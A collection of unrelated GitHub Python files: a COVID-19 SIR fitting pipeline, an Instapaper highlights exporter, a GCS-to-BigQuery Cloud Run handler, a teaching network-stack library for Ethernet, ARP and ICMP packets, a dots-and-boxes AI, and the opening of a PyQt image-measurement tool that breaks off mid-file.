metadata (dict) | text (string, 60 – 3.49M characters)
---|---
{
"source": "jitinmat23/Enterprise_Data_Science_Covid_analysis",
"score": 3
} |
#### File: src/data/get_data_for_SIR.py
```python
import subprocess
import os
import pandas as pd
import numpy as np
from datetime import datetime
from bs4 import BeautifulSoup
import requests
import json
def get_johns_hopkins():
    ''' Get data via a git pull; the Johns Hopkins COVID-19 repository has to be cloned first.
    The result is stored in the predefined csv structure.
    '''
git_pull = subprocess.Popen( ["git", "pull"],#"/usr/bin/git pull" ,
cwd = os.path.dirname( 'C:/Users/jitin/ads_covid-19/data/raw/COVID-19/' ),
shell = True,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE )
(out, error) = git_pull.communicate()
print("Error : " + str(error))
print("out : " + str(out))
def get_current_data_germany():
    ''' Get current data for Germany; note that the API endpoint is not very stable.
    The result is built as a pd.DataFrame and stored as a csv file.
    '''
# 16 states
#data=requests.get('https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/Coronaf%C3%A4lle_in_den_Bundesl%C3%A4ndern/FeatureServer/0/query?where=1%3D1&outFields=*&outSR=4326&f=json')
# 400 regions / Landkreise
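    # Query parameters: where=1=1 returns every record, outFields=* returns all
    # attribute columns, outSR=4326 requests WGS84 coordinates, f=json selects
    # the JSON response format.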
data=requests.get('https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_Landkreisdaten/FeatureServer/0/query?where=1%3D1&outFields=*&outSR=4326&f=json')
json_object=json.loads(data.content)
full_list=[]
for pos,each_dict in enumerate (json_object['features'][:]):
full_list.append(each_dict['attributes'])
pd_full_list=pd.DataFrame(full_list)
pd_full_list.to_csv('C:/Users/jitin/ads_covid-19/data/raw/NPGEO/GER_State_Data.csv',sep=';')
print(' Number of regions rows: '+str(pd_full_list.shape[0]))
def get_world_population_data():
page = requests.get("https://www.worldometers.info/world-population/population-by-country/")
soup = BeautifulSoup(page.content, 'html.parser')
html_table_pop = soup.find('table')
all_rows_pop = html_table_pop.find_all('tr')
final_pop_data_list=[]
for pos,rows in enumerate(all_rows_pop):
col_list= [each_col.get_text(strip=True) for each_col in rows.find_all('td') ]
final_pop_data_list.append(col_list)
reqd_pop_list = pd.DataFrame(final_pop_data_list).dropna()\
.rename(columns={1:'country', 2:'population'})
reqd_pop_list = reqd_pop_list[['country','population']]
    #Replace country names that differ from the Johns Hopkins naming convention
reqd_pop_list["country"]= reqd_pop_list["country"].replace({'Myanmar':'Burma', 'Czech Republic (Czechia)': 'Czechia', 'DR Congo': 'Congo (Kinshasa)', 'Congo': 'Congo (Brazzaville)', 'South Korea': 'Korea, South', 'St. Vincent & Grenadines': 'Saint Vincent and the Grenadines', 'Taiwan': 'Taiwan*', 'United States': 'US','State of Palestine': 'West Bank and Gaza', 'Côte d\'Ivoire': 'Cote d\'Ivoire'})
    #Add entries missing from the scraped list, e.g. the Diamond Princess, Kosovo, etc.
list_new_country = [pd.Series(['Diamond Princess', 3711], index = reqd_pop_list.columns ) ,
pd.Series(['Kosovo', 1845000], index = reqd_pop_list.columns ) ,
pd.Series(['MS Zaandam', 1432], index = reqd_pop_list.columns ),
                        pd.Series(['Saint Kitts and Nevis', 52441], index = reqd_pop_list.columns ),
                        pd.Series(['Sao Tome and Principe', 211028], index = reqd_pop_list.columns )]
    #Change the ordering of countries from highest population to alphabetical order
reqd_pop_list = reqd_pop_list.append(list_new_country, ignore_index=True)\
.sort_values('country')\
.reset_index(drop=True)
reqd_pop_list.to_csv('C:/Users/jitin/ads_covid-19/data/raw/world_population_data.csv',sep=';',index=False)
print('Number of rows: '+str(reqd_pop_list.shape[0]))
if __name__ == '__main__':
get_johns_hopkins()
get_current_data_germany()
get_world_population_data()
```
#### File: src/features/build_features_SIR.py
```python
import pandas as pd
import numpy as np
from datetime import datetime
# %matplotlib inline  # IPython magic, valid only in notebooks; kept as a comment so the module parses as a script
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(style="darkgrid")
mpl.rcParams['figure.figsize'] = (16, 9)
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', None)
from scipy import optimize
from scipy import integrate
def data_gathering():
population_df = pd.read_csv('C:/Users/jitin/ads_covid-19/data/raw/world_population_data.csv',sep=';', thousands=',')
population_df = population_df.set_index(['country']).T
df_analyse = pd.read_csv('C:/Users/jitin/ads_covid-19/data/processed/all_country_data.csv',sep=';')
country_list = df_analyse.columns[1:]
infected_list = []
t=[]
for column in df_analyse.columns:
infected_list.append(np.array(df_analyse[column][75:]))
t = np.arange(len(infected_list))
infected_list = pd.DataFrame(infected_list,index=df_analyse.columns).T
infected_list.to_csv('C:/Users/jitin/ads_covid-19/data/processed/SIR/SIR_data.csv',sep=';',index=False)
optimized_df = pd.DataFrame(columns = df_analyse.columns[1:],
index = ['opt_beta', 'opt_gamma', 'std_dev_error_beta', 'std_dev_error_gamma'])
t = []
fitted_final_data = []
global I0, N0, S0, R0
for column in infected_list.columns[1:]:
I0 = infected_list[column].loc[0]
N0 = population_df[column].loc['population']
S0 = N0-I0
R0 = 0
t = np.arange(len(infected_list[column]))
popt=[0.4,0.1]
fit_odeint(t, *popt)
popt, pcov = optimize.curve_fit(fit_odeint, t, infected_list[column], maxfev=5000)
perr = np.sqrt(np.diag(pcov))
optimized_df.at['opt_beta', column] = popt[0]
optimized_df.at['opt_gamma', column] = popt[1]
optimized_df.at['std_dev_error_beta', column] = perr[0]
optimized_df.at['std_dev_error_gamma', column] = perr[1]
fitted = fit_odeint(t, *popt)
fitted_final_data.append(np.array(fitted))
optimized_df.to_csv('C:/Users/jitin/ads_covid-19/data/processed/SIR/optimized_SIR_data.csv',sep=';',index=False)
fitted_SIR_data_df = pd.DataFrame(fitted_final_data,index=df_analyse.columns[1:]).T
fitted_SIR_data_df.to_csv('C:/Users/jitin/ads_covid-19/data/processed/SIR/fitted_SIR_data.csv',sep=';',index=False)
print(' Number of rows stored in optimized df: '+str(optimized_df.shape[0]))
print(' Number of rows stored in fitted SIR data: '+str(fitted_SIR_data_df.shape[0]))
def SIR_model_t(SIRN,t,beta,gamma):
''' Simple SIR model
S: susceptible population
t: time step, mandatory for integral.odeint
I: infected people
R: recovered people
    beta: infection rate
    gamma: recovery rate
    overall condition is that the sum of changes (differences) sums up to 0
dS+dI+dR=0
S+I+R= N (constant size of population)
'''
S,I,R,N=SIRN
    dS_dt=-beta*S*I/N  # beta*S*I/N is the rate of new infections
dI_dt=beta*S*I/N-gamma*I
dR_dt=gamma*I
dN_dt=0
return dS_dt,dI_dt,dR_dt,dN_dt
def fit_odeint(t, beta, gamma):
'''
helper function for the integration
'''
    return integrate.odeint(SIR_model_t, (S0, I0, R0, N0), t, args=(beta, gamma))[:,1] # return only the infected compartment I(t)
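# Editor's sketch (not part of the original pipeline): a minimal, self-contained
# example of fitting the SIR model above to synthetic case counts with
# scipy.optimize.curve_fit. The population size, initial infections and the
# "true" beta/gamma values below are illustrative assumptions only.
def sir_fit_example():
    global I0, N0, S0, R0
    N0 = 1000000            # assumed population size
    I0 = 50                 # assumed initially infected
    S0 = N0 - I0
    R0 = 0
    t = np.arange(100)
    # Generate noisy synthetic data from known parameters beta=0.4, gamma=0.1
    synthetic = fit_odeint(t, 0.4, 0.1) + np.random.normal(0, 20, size=t.shape)
    popt, pcov = optimize.curve_fit(fit_odeint, t, synthetic, maxfev=5000)
    perr = np.sqrt(np.diag(pcov))
    print('fitted beta, gamma:', popt, 'std dev:', perr)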
if __name__ == '__main__':
# test_data_reg=np.array([2,4,6])
# result=get_doubling_time_via_regression(test_data_reg)
# print('the test slope is: '+str(result))
#
# pd_JH_data=pd.read_csv('C:/Users/jitin/ads_covid-19/data/processed//COVID_relational_confirmed.csv',sep=';',parse_dates=[0])
# pd_JH_data=pd_JH_data.sort_values('date',ascending=True).copy()
#
# #test_structure=pd_JH_data[((pd_JH_data['country']=='US')|
# # (pd_JH_data['country']=='Germany'))]
#
# pd_result_larg=calc_filtered_data(pd_JH_data)
# pd_result_larg=calc_doubling_rate(pd_result_larg)
# pd_result_larg=calc_doubling_rate(pd_result_larg,'confirmed_filtered')
#
#
# mask=pd_result_larg['confirmed']>100
# pd_result_larg['confirmed_filtered_DR']=pd_result_larg['confirmed_filtered_DR'].where(mask, other=np.NaN)
# pd_result_larg.to_csv('C:/Users/jitin/ads_covid-19/data/processed/COVID_final_set.csv',sep=';',index=False)
# print(pd_result_larg[pd_result_larg['country']=='Germany'].tail())
data_gathering()
``` |
{
"source": "jitinnair1/save-instapaper-highlights",
"score": 3
} |
#### File: jitinnair1/save-instapaper-highlights/downloader.py
```python
import datetime
import os
import configparser
import progressbar
import string
import codecs
import json
from instapaper import Instapaper
# Init instapaper with key, secret, login and password
def init():
# Read credentials from Credentials.ini file
configParser = configparser.RawConfigParser()
configParser.read('Credentials.ini')
key = configParser.get('Instapaper', 'INSTAPAPER_KEY')
secret = configParser.get('Instapaper', 'INSTAPAPER_SECRET')
login = configParser.get('Login', 'INSTAPAPER_LOGIN')
password = configParser.get('Login', 'INSTAPAPER_PASSWORD')
# Create instance of Instapaper using the OAth credentials
instapaper = Instapaper(key, secret)
# Login with user and password
instapaper.login(login, password)
return instapaper
def process_folder(folderid, existing):
# Get bookmarks from archive for each of the folders
bookmarks = instapaper.bookmarks(folder=folderid, have=existing, limit=500)
# process all bookmarks
process_bookmarks(bookmarks)
def check_saved_state():
# If there is no file in with bookmark hashes then create it
file_exists = os.path.isfile("saved_state.txt")
if file_exists:
print("Last State Exists")
# read file contents to existing
existing=get_list_of_existing_highlights()
return existing
def process_saved_state(foldername):
bookmarks = instapaper.bookmarks(folder=foldername, have="", limit=500)
for bookmark in bookmarks:
fp = open("../saved_state.txt", "a+")
fp.write(str(bookmark.bookmark_id) + ":" + bookmark.hash + ",")
def get_list_of_existing_highlights():
    # Read the saved state file containing bookmark ids and hashes
text_file = open("saved_state.txt", "r")
existing = text_file.readlines()
return existing
def change_to_highlights_folder():
# If there is no folder in the system with highlights then create it
if not os.path.exists('highlights'):
os.makedirs('highlights')
# Change to the folder
os.chdir('highlights')
# Process list of bookmarks
def process_bookmarks(bookmarks):
progress = progressbar.ProgressBar(max_value=len(bookmarks))
i = 1
for bookmark in bookmarks:
process_bookmark(bookmark)
progress.update(i)
i = i + 1
def get_filename_from_title(title):
"""Generate simpler file name from title
Arguments:
title {string} -- Simplified title to be used as the markdown filename
"""
printable = set(string.ascii_letters)
printable.add(' ')
return ''.join(filter(lambda x : x in printable, title)).strip().replace(' ', '_') + '.md'
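# Editor's example: only ASCII letters and spaces are kept, so
# get_filename_from_title('Hello, World! (2021)') returns 'Hello_World.md'.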
# Process the highlights of one bookmark
def process_bookmark(bookmark):
# Get the highlights
highlights = bookmark.get_highlights()
    # Process the document only if there is at least one highlight
if len(highlights) > 0:
process_document(bookmark, highlights)
def process_document(bookmark, highlights):
"""Takes a document and generates the equivalent markdown file
Arguments:
document {dictionary} -- Dictionary with title, url and list of highlights
"""
output_path = get_filename_from_title(bookmark.title)
#parse highlights as JSON
highlights_json=json.loads(highlights)
# count number of highlights with a given bookmark id
highlight_count = len(highlights_json)
if(highlight_count>0):
with codecs.open(output_path, 'w', 'utf-8') as f:
f.write('# ' + bookmark.title + '\n')
f.write('\n')
f.write('[Source](' + bookmark.url + ')' + '\n')
f.write('\n')
f.write(repr(highlight_count) + ' highlights' +'\n')
f.write('\n')
f.write('---' + '\n')
f.write('\n')
index=0;
while index < highlight_count:
f.write('* '+ highlights_json[index]['text'])
if highlights_json[index]['note']!= None:
f.write("[^" + str(highlights_json[index]['highlight_id']) + "]")
f.write('\n\n')
f.write("[^" + str(highlights_json[index]['highlight_id']) + "]: " + str(highlights_json[index]['note']) + '\n')
f.write('\n\n')
index=index+1;
# ----------------------------------
# Init Instapaper
instapaper = init()
# Get existing highlights
existing=check_saved_state()
# Change to highlights folder
change_to_highlights_folder()
# Get list of folders
folders = instapaper.folders()
folders = [{"folder_id": "archive"}, {"folder_id": "starred"}] + folders
# Process bookmarks for each folder
for folder in folders:
if (folder['folder_id']=="archive" or folder['folder_id']=="starred"):
print("Processing Folder: " + folder['folder_id'])
else:
print("Processing Folder: " + folder['title'])
process_folder(folder['folder_id'], existing)
# create new file and add hash of all bookmarks
if os.path.exists("saved_state.txt"):
os.remove("saved_state.txt")
progress = progressbar.ProgressBar(max_value=len(folders))
print("Writing Last Saved States:")
i = 1
for folder in folders:
    process_saved_state(folder['folder_id'])
    progress.update(i)
    i = i + 1
``` |
{
"source": "jitkasem-pdt/python-docs-samples",
"score": 2
} |
#### File: eventarc/audit-storage/main.py
```python
import os
from flask import Flask, request
from google.cloud import bigquery
app = Flask(__name__)
# [END eventarc_gcs_server]
# [START eventarc_gcs_handler]
@app.route('/', methods=['POST'])
def index():
# Gets the GCS bucket name from the CloudEvent header
# Example: "storage.googleapis.com/projects/_/buckets/my-bucket"
# storage.googleapis.com/projects/_/buckets/test_dong/objects/support_site.csv
bucket = request.headers.get('ce-subject')
    subject_parts = bucket.split("/")
    bucket_name = subject_parts[4]    # e.g. "test_dong"
    object_name = subject_parts[6]    # e.g. "support_site.csv"
# Construct a BigQuery client object.
client = bigquery.Client()
# TODO(developer): Set table_id to the ID of the table to create.
table_id = "thailife.cloud_run.test_tbl"
job_config = bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("name", "STRING"),
bigquery.SchemaField("post_abbr", "STRING"),
],
skip_leading_rows=1,
# The source format defaults to CSV, so the line below is optional.
source_format=bigquery.SourceFormat.CSV,
)
    uri = f"gs://{bucket_name}/{object_name}"
load_job = client.load_table_from_uri(
uri, table_id, job_config=job_config
) # Make an API request.
load_job.result() # Waits for the job to complete.
destination_table = client.get_table(table_id)
# Make an API request.
# print("Loaded {} rows.".format(destination_table.num_rows))
print(f"Detected change in GCS bucket: {bucket}")
return (f"Detected change in GCS bucket: {bucket}", 200)
# [END eventarc_gcs_handler]
# [START eventarc_gcs_server]
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))
# [END eventarc_gcs_server]
``` |
{
"source": "Jitrixis/2ARC-Network-stack",
"score": 2
} |
#### File: TVpy/Factory/sniffery.py
```python
__author__ = 'jitrixis'
from TVpy.Layers.all import *
class Sniffery:
def __init__(self):
self.__passed = True
self.__type = ""
pass
def sniff(self, data):
self.__passed = True
packet = {}
'''Ethernet'''
valE = self.__sniffEthernet(data)
packet["ethernet"] = valE[0]
data = valE[1]
if (valE[0].getType() == 0x0800):
'''IPv4'''
valI = self.__sniffIp(data)
packet["ip"] = valI[0]
data = valI[1]
if (valI[0].getProto() == 1):
'''Icmp'''
valJ = self.__sniffIcmp(data)
packet["icmp"] = valJ[0]
data = valJ[1]
self.__type = "icmp"
elif (valI[0].getProto() == 6):
'''Tcp'''
valT = self.__sniffTcp(data)
packet["tcp"] = valT[0]
data = valT[1]
self.__type = "tcp"
else:
self.__passed = False
elif (valE[0].getType() == 0x0806):
'''Arp'''
valA = self.__sniffArp(data)
packet["arp"] = valA[0]
data = valA[1]
self.__type = "arp"
else:
self.__passed = False
'''Data'''
valD = self.__sniffData(data)
packet["data"] = valD[0]
data = valD[1]
if (self.__passed):
return {"type": self.__type, "packet": packet}
return None
def __sniffEthernet(self, data):
return self.__sniffAll(Ethernet(), data)
def __sniffArp(self, data):
return self.__sniffAll(Arp(), data)
def __sniffIcmp(self, data):
return self.__sniffAll(Icmp(), data)
def __sniffIp(self, data):
return self.__sniffAll(Ip(), data)
def __sniffTcp(self, data):
return self.__sniffAll(Tcp(), data)
def __sniffData(self, data):
return self.__sniffAll(Data(), data)
def __sniffAll(self, cls, data):
data = cls.fromSource(data)
return [cls, data]
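# Editor's usage sketch (raw_frame is a hypothetical byte source in the format
# the Toolkit consume* helpers expect):
# sniffer = Sniffery()
# result = sniffer.sniff(raw_frame)
# if result is not None and result["type"] == "arp":
#     print(result["packet"]["arp"].getPsrc())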
```
#### File: Layers/Frame/Ethernet.py
```python
__author__ = 'jitrixis'
from TVpy.Factory.toolsheds import Toolkit
class Ethernet:
def __init__(self):
self.__src = '00:00:00:00:00:00'
self.__dst = 'ff:ff:ff:ff:ff:ff'
self.__type = 0x0
'''Destination MAC Address'''
def getDst(self):
return self.__dst
def setDst(self, dst):
self.__dst = dst
return self
def __buildDst(self):
return Toolkit.buildMAC(self.__dst)
def __consumeDst(self, data):
val = Toolkit.consumeMAC(data)
self.__dst = val[0]
return val[1]
'''Source MAC Address'''
def getSrc(self):
return self.__src
def setSrc(self, src):
self.__src = src
return self
def __buildSrc(self):
return Toolkit.buildMAC(self.__src)
def __consumeSrc(self, data):
val = Toolkit.consumeMAC(data)
self.__src = val[0]
return val[1]
'''Type Ethernet Data'''
def getType(self):
return self.__type
def setType(self, type):
self.__type = type
return self
def __buildType(self):
return Toolkit.buildInt2(self.__type)
def __consumeType(self, data):
val = Toolkit.consumeInt2(data)
self.__type = val[0]
return val[1]
'''Building method'''
def build(self):
return self.__buildDst() + self.__buildSrc() + self.__buildType()
def fromSource(self, data):
data = self.__consumeDst(data)
data = self.__consumeSrc(data)
data = self.__consumeType(data)
return data
def getLength(self):
return len(self.build())
```
#### File: Layers/Packet/ARP.py
```python
__author__ = 'jitrixis'
from TVpy.Factory.toolsheds import Toolkit
class Arp:
def __init__(self):
self.__hwtype = 0x1
self.__ptype = 0x800
self.__hwlen = 6
self.__plen = 4
self.__op = 0x1
self.__hwsrc = '00:00:00:00:00:00'
self.__psrc = '0.0.0.0'
self.__hwdst = '00:00:00:00:00:00'
self.__pdst = '0.0.0.0'
'''Hardware Type'''
def getHwtype(self):
return self.__hwtype
def setHwtype(self, hwtype):
self.__hwtype = hwtype
return self
def __buildHwtype(self):
return Toolkit.buildInt2(self.__hwtype)
def __consumeHwtype(self, data):
val = Toolkit.consumeInt2(data)
self.__hwtype = val[0]
return val[1]
'''IP Type'''
def getPtype(self):
return self.__ptype
def setPtype(self, ptype):
self.__ptype = ptype
return self
def __buildPtype(self):
return Toolkit.buildInt2(self.__ptype)
def __consumePtype(self, data):
val = Toolkit.consumeInt2(data)
self.__ptype = val[0]
return val[1]
'''Hardware length'''
def getHwlen(self):
return self.__hwlen
def setHwlen(self, hwlen):
self.__hwlen = hwlen
return self
def __buildHwlen(self):
return Toolkit.buildInt1(self.__hwlen)
def __consumeHwlen(self, data):
val = Toolkit.consumeInt1(data)
self.__hwlen = val[0]
return val[1]
'''IP length'''
def getPlen(self):
return self.__plen
def setPlen(self, plen):
self.__plen = plen
return self
def __buildPlen(self):
return Toolkit.buildInt1(self.__plen)
def __consumePlen(self, data):
val = Toolkit.consumeInt1(data)
self.__plen = val[0]
return val[1]
'''Operation'''
def getOp(self):
return self.__op
def setOp(self, op):
self.__op = op
return self
def __buildOp(self):
return Toolkit.buildInt2(self.__op)
def __consumeOp(self, data):
val = Toolkit.consumeInt2(data)
self.__op = val[0]
return val[1]
'''Hardware Source'''
def getHwsrc(self):
return self.__hwsrc
def setHwsrc(self, hwsrc):
self.__hwsrc = hwsrc
return self
def __buildHwsrc(self):
return Toolkit.buildMAC(self.__hwsrc)
def __consumeHwsrc(self, data):
val = Toolkit.consumeMAC(data)
self.__hwsrc = val[0]
return val[1]
'''IP Source'''
def getPsrc(self):
return self.__psrc
def setPsrc(self, psrc):
self.__psrc = psrc
return self
def __buildPsrc(self):
return Toolkit.buildIPv4(self.__psrc)
def __consumePsrc(self, data):
val = Toolkit.consumeIPv4(data)
self.__psrc = val[0]
return val[1]
'''Hardware Destination'''
def getHwdst(self):
return self.__hwdst
def setHwdst(self, hwdst):
self.__hwdst = hwdst
return self
def __buildHwdst(self):
return Toolkit.buildMAC(self.__hwdst)
def __consumeHwdst(self, data):
val = Toolkit.consumeMAC(data)
self.__hwdst = val[0]
return val[1]
'''IP Destination'''
def getPdst(self):
return self.__pdst
def setPdst(self, pdst):
self.__pdst = pdst
return self
def __buildPdst(self):
return Toolkit.buildIPv4(self.__pdst)
def __consumePdst(self, data):
val = Toolkit.consumeIPv4(data)
self.__pdst = val[0]
return val[1]
'''Building method'''
def build(self):
ret = self.__buildHwtype() + self.__buildPtype()
ret += self.__buildHwlen() + self.__buildPlen()
ret += self.__buildOp()
ret += self.__buildHwsrc() + self.__buildPsrc()
ret += self.__buildHwdst() + self.__buildPdst()
return ret
def fromSource(self, data):
data = self.__consumeHwtype(data)
data = self.__consumePtype(data)
data = self.__consumeHwlen(data)
data = self.__consumePlen(data)
data = self.__consumeOp(data)
data = self.__consumeHwsrc(data)
data = self.__consumePsrc(data)
data = self.__consumeHwdst(data)
data = self.__consumePdst(data)
return data
def getLength(self):
return len(self.build())
```
#### File: Layers/Packet/ICMP.py
```python
__author__ = 'jitrixis'
from TVpy.Factory.toolsheds import Toolkit
class Icmp:
def __init__(self):
self.__type = 8
self.__code = 0
self.__checksum = 0x0
self.__id = 0x0
self.__seq = 0x0
'''Type'''
def getType(self):
return self.__type
def setType(self, type):
self.__type = type
return self
def __buildType(self):
return Toolkit.buildInt1(self.__type)
def __consumeType(self, data):
val = Toolkit.consumeInt1(data)
self.__type = val[0]
return val[1]
'''Code'''
def getCode(self):
return self.__code
def setCode(self, code):
self.__code = code
return self
def __buildCode(self):
return Toolkit.buildInt1(self.__code)
def __consumeCode(self, data):
val = Toolkit.consumeInt1(data)
self.__code = val[0]
return val[1]
'''Checksum'''
def getChecksum(self):
self.__setChecksum()
return self.__checksum
def __setChecksum(self):
first_sum = 0
first_sum += self.getType() * 0x100 + self.getCode()
first_sum += self.getId()
first_sum += self.getSeq()
second_sum = first_sum % 0x10000
        second_sum += first_sum // 0x10000  # integer division: fold the carry back into 16 bits
self.__checksum = second_sum ^ 0xffff
return self
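    # Editor's worked example: the checksum is the one's-complement of the folded
    # 16-bit sum. For the default echo request (type=8, code=0, id=0, seq=0) the
    # sum is 8*0x100 = 0x0800, so the checksum is 0x0800 ^ 0xffff = 0xf7ff.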
def __buildChecksum(self):
self.__setChecksum()
return Toolkit.buildInt2(self.__checksum)
def __consumeChecksum(self, data):
val = Toolkit.consumeInt2(data)
self.__checksum = val[0]
return val[1]
'''Id'''
def getId(self):
return self.__id
def setId(self, id):
self.__id = id
return self
def __buildId(self):
return Toolkit.buildInt2(self.__id)
def __consumeId(self, data):
val = Toolkit.consumeInt2(data)
self.__id = val[0]
return val[1]
'''Sequence'''
def getSeq(self):
return self.__seq
def setSeq(self, seq):
self.__seq = seq
return self
def __buildSeq(self):
return Toolkit.buildInt2(self.__seq)
def __consumeSeq(self, data):
val = Toolkit.consumeInt2(data)
self.__seq = val[0]
return val[1]
'''Building method'''
def build(self):
ret = self.__buildType() + self.__buildCode()
ret += self.__buildChecksum()
ret += self.__buildId()
ret += self.__buildSeq()
return ret
def fromSource(self, data):
data = self.__consumeType(data)
data = self.__consumeCode(data)
data = self.__consumeChecksum(data)
data = self.__consumeId(data)
data = self.__consumeSeq(data)
return data
def getLength(self):
return len(self.build())
``` |
{
"source": "Jitrixis/4AIT-Project",
"score": 3
} |
#### File: 4AIT-Project/game/player.py
```python
import random
from game.board import VirtualBoard
from ui.uiutils import UIUtils
class AbsractPlayer:
PLAYER_NUMBER = 0
def __init__(self, player=None):
if player is not None:
self._player = player
else:
self._player = self.PLAYER_NUMBER
            AbsractPlayer.PLAYER_NUMBER += 1  # bump the class-level counter (writing via self would only create an instance copy)
def get_player(self):
return self._player
def run(self, semaphore_event, board):
pass
class HumanPlayer(AbsractPlayer):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
if semaphore_event is not None:
board.play(semaphore_event)
class AI1Player(AbsractPlayer):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
def _available_square(self, board):
return [square for row in board.get_squares() for square in row if not square]
def _pos_of(self, squares):
lines = []
for square in squares:
lines += [line.get_pos() for line in square.get_lines() if not line]
lines = set(lines)
return list(lines)
class AI2Player(AI1Player):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
l = self._pos_of(self._priority_square(board))
if len(l) == 0:
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
def _priority_square(self, board):
return [square for row in board.get_squares() for square in row if len(square) == 3]
class AI3Player(AI2Player):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
l = self._pos_of(self._priority_square(board))
if len(l) == 0:
d = self._pos_of(self._dangerous_square(board))
a = self._pos_of(self._available_square(board))
l = [line for line in a if line not in d]
if len(l) == 0:
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
def _dangerous_square(self, board):
return [square for row in board.get_squares() for square in row if len(square) == 2]
class AI4Player(AI3Player):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
l = self._pos_of(self._priority_square(board))
if len(l) == 0:
d = self._pos_of(self._dangerous_square(board))
a = self._pos_of(self._available_square(board))
l = [line for line in a if line not in d]
if len(l) == 0:
e = self._count_effect(board)
if len(e):
l = [p for f in min(e, key=len) for p in f]
if len(l) == 0:
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
def _count_effect(self, board):
pairs = [[tuple(line.get_pos() for line in square.get_lines() if not line)] for square in
self._dangerous_square(board)]
changed = True
while changed:
changed = False
for i in range(len(pairs) - 1):
for j in range(i + 1, len(pairs)):
if bool(set(p for e in pairs[i] for p in e) & set(p for e in pairs[j] for p in e)):
pairs[i] += pairs[j]
pairs[j] = []
changed = True
pairs = [e for e in pairs if len(e)]
return pairs
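    # Editor's note: _count_effect groups "dangerous" squares (two sides already
    # drawn) into chains by repeatedly merging groups that share an open line.
    # AI4Player then plays into the shortest chain, giving the opponent as few
    # boxes as possible once no safe move remains.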
class AI5Player(AI4Player):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
d = self._pos_of(self._dangerous_square(board))
a = self._pos_of(self._available_square(board))
e = self._count_effect(board)
o = self._pos_of(self._priority_square(board))
l = []
if len(l) == 0:
l = o
if len(l) > 0:
ef = self._count_effect(board)
if len(ef) > 0 and not len([line for line in a if line not in d]):
mef = []
oef = []
for pef in ef:
if bool(set(p for sq in pef for p in sq) & set(l)):
mef.append(pef)
else:
oef.append(pef)
if len(mef) == 1:
if len(mef[0]) == 1:
if len(oef) % board.get_num_player():
l = [p for p in mef[0][0] if p not in l]
if len(l) == 0:
l = [line for line in a if line not in d]
if len(l) == 0:
if len(e):
l = [p for f in min(e, key=len) for p in f]
if len(l) == 0:
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
class Developer(AbsractPlayer):
def __init__(self, cls):
super().__init__(cls.get_player())
self.__cls_player = cls
self.__want = None
def run(self, semaphore_event, board):
if self.__want is None:
v = VirtualBoard(board)
self.__cls_player.run(None, v)
self.__want = v.get_last_play()
else:
UIUtils.debug_line(self.__want)
if type(semaphore_event) is tuple:
board.play(semaphore_event)
self.__want = None
elif semaphore_event == 'N':
board.play(self.__want)
self.__want = None
``` |
{
"source": "JitseB/ImageP",
"score": 2
} |
#### File: JitseB/ImageP/imagep.py
```python
from PyQt5 import QtWidgets, QtGui, QtCore
import pyqtgraph as pg
import numpy as np
import sys, cv2
VERSION_INFO = 'version 2.5'
CHANGELOG = """Changelog:
Version 2.5 (19 June 2021):
- Swapped out Matplotlib for PyQtGraph for better video performance.
- Added LUT (lookup-table) to change different levels of red-green-blue.
- Added image/frame grayscale converter as tickbox in the GUI.
Version 2.4 (26 May 2021):
- Refactoring.
- Bug fix: When setting the 'frame' parameter, the initial frame now corresponds to this value.
Version 2.3 (25 May 2021):
- Bug fix: When no dots have been clicked yet, the menu ctrl+z button no longer throws an error.
- Video files are now supported! By using the right and left arrow one can flip through the frames.
- Auto-progress parameter was added for videos.
- Added frame number to statusbar for videos.
- Added alpha parameters (also: keep_alpha parameter) to change axis and dot opacity.
- Added 'auto_progress_frame_interval' as video parameter so that frames can be skipped when auto-progressing the frames.
Version 2.2 (22 May 2021):
- Bug fix: No dot added when in zoom or pan mode.
- Added ctrl+z feature to remove previously clicked dot.
Version 2.1 (16 May 2021):
- Bug fix: 'gui'-parameters now actually work.
- Bug fix: Reuse QtApplication, otherwise the kernel dies in Jupyter notebooks.
- Bug fix: Catching warning caused by angle measurement.
- Removed unit origin as we cannot know it previous position, therefore we cannot compensate for it properly.
Version 2.0 (16 May 2021):
- Converted to PyQt5 application for more functionality.
- Added movable origin and button.
- Added About and Help page.
- Changed Pillow out for OpenCV for future compatibility of videos.
- Added status bar with position, distance and angle texts.
- Added pixel calibration mechanism.
- Lots of refactoring and added documentation.
Version 1.0 (9 May 2021):
- Simple single class image processor using a Matplotlib GUI and its events.
"""
DOCUMENTATION = """Please view the documentation on the <a href="https://github.com/JitseB/ImageP/blob/main/DOCUMENTATION.md">GitHub repository</a>."""
class PlotWidget(QtWidgets.QWidget):
point_add_event = QtCore.pyqtSignal(tuple)
point_remove_last_event = QtCore.pyqtSignal()
origin_change_event = QtCore.pyqtSignal(tuple)
mouse_move_event = QtCore.pyqtSignal(tuple)
"""Qt widget to hold the PyQtGraph widget and the tools for interacting with the plot"""
def __init__(self, window):
QtWidgets.QWidget.__init__(self)
self.image = np.flipud(np.rot90(window.image))
self.color = window.color
self._shift_active = False
self.origin_move_active = False
self._grayscale_active = False
self.canvas = pg.ImageView()
# Use a grid layout for the plot, LUT and settings (with title)
        # Since the settings and LUT only need local referencing, we do not have to create a separate class
layout = QtGui.QGridLayout()
self.setLayout(layout)
self.lut = pg.HistogramLUTWidget()
layout.addWidget(self.lut, 1, 1)
self._plt = pg.plot()
self._plt.setAspectLocked(True)
self.img = pg.ImageItem(self.image)
self.img.setZValue(-10)
self.scatter = pg.ScatterPlotItem(pen=None, brush=pg.mkBrush(self.color))
self._plt.addItem(self.scatter)
self._plt.addItem(self.img)
